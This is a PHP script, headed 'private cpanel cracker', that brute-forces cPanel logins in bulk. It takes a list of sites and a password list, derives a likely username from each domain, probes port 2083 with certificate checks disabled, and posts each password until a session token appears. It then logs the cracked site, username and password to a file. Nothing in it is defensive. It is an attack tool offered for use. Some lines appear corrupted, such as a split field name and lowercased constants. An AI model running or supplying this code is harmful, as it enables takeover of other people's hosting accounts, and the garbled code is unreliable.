set_time_limit(0);

/************************************************** ******************
* private cpanel cracker
************************************************** *******************/

class cracker
{

public $sitelist;
public $passlist;

public function calis()
{
$usernames = $this->make_username();
$sitelist = explode("\n",$this->openfile($this->sitelist));
$passlist = explode("\n",$this->openfile($this->passlist));
$increment = 0;

echo "\n\n[*]site list -> $this->sitelist\n";
echo "[*]pass list -> $this->passlist\n";
echo "[*]total urls -> ".count($sitelist)."\n";
echo "[*]total pass -> ".count($passlist)."\n";
echo "[*]cracking started\n\n";

foreach($sitelist as $id => $site)
{
$increment++;
$site = trim($site);
echo "-------------------------------------------------------\n";
echo "[*]trying site: ".$site." $increment / ".count($sitelist)."\n";
if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{
$site = "https://$site";
}
$site= $site.":2083";

if(!$this->pass_site($site))
{
echo "[-]not cpanel,passing site\n";
echo "-------------------------------------------------------\n\n";
continue;
}

echo "[*]connected cpanel [ok]\n";
echo "[*]username: ".$usernames[$id]."\n";
echo "[*]loaded ".count($passlist)." passwords\n";

foreach($passlist as $pass)
{
$cracked = false;

$pass=trim($pass);

$result = $this->post($site,$usernames[$id],$pass);

if(preg_match('/security_token/',$result))
{
$cracked = true;
echo "[+]$pass password cracked for $usernames[$id]\n";
echo "-------------------------------------------------------\n\n";
$this->savefile("$site|$usernames[$id]|$pass");
break;
}

}
if(!$cracked){echo "[-]not found\n";echo "-------------------------------------------------------\n\n";}
}

}

private function make_username()
{
$op = explode("\n",$this->openfile($this->sitelist));
foreach($op as $site)
{

if(eregi('http://',$site)) $site = str_replace("http://","",$site);
if(!eregi('www',$site)) $site = "www.".$site;

$site = explode(".",$site);
$site = str_replace("-","",$site[1]);

$usernames[] = substr($site,0,8);

}
return $usernames;
}

public function lists()
{
echo "[!]site list: ";
$sitelist = fgets(stdin);
$sitelist = str_replace("\r\n","",$sitelist);
$sitelist = trim($sitelist);
echo "[!]pass list: ";
$passlist = fgets(stdin);
$passlist = str_replace("\r\n","",$passlist);
$passlist = trim($passlist);

return array($sitelist,$passlist);
}

private function post($site,$user,$pass)
{
$curl = curl_init();
curl_setopt($curl,curlopt_returntransfer,true);
curl_setopt($curl,curlopt_url,$site."/login/?login_only=1");
curl_setopt($curl,curlopt_ssl_verifyhost,0);
curl_setopt($curl,curlopt_ssl_verifypeer,0);
curl_setopt($curl,curlopt_timeout,7);
curl_setopt($curl,curlopt_followlocation,true);
curl_setopt($curl,curlopt_post,1);
curl_setopt($curl,curlopt_postfields,"user=$user&p ass=$pass");
$exec = curl_exec($curl);
return $exec;
}

private function pass_site($site)
{
$curl = curl_init();
curl_setopt($curl,curlopt_returntransfer,true);
curl_setopt($curl,curlopt_url,$site);
curl_setopt($curl,curlopt_ssl_verifyhost,0);
curl_setopt($curl,curlopt_ssl_verifypeer,0);
curl_setopt($curl,curlopt_followlocation,true);
curl_setopt($curl,curlopt_timeout,7);
$exec = curl_exec($curl);
$info = curl_getinfo($curl);

if($info['http_code'] != 0)
{
return true;
}
else
{
return false;
}

}

private function openfile($file)
{
$file = @file_get_contents($file);
if(!$file) exit("wtc file not found ?");
return $file;
}

private function savefile($content)
{
$file = fopen('crackerlog.txt','ab');
fwrite($file,$content."\r\n");
fclose($file);
return $file;
}

}

$class = new cracker();
$lists = $class->lists();

if(empty($lists[0]) || empty($lists[1])) exit("wtc empty ? ");

$class->sitelist = $lists[0];
$class->passlist = $lists[1];
$class->calis();


?>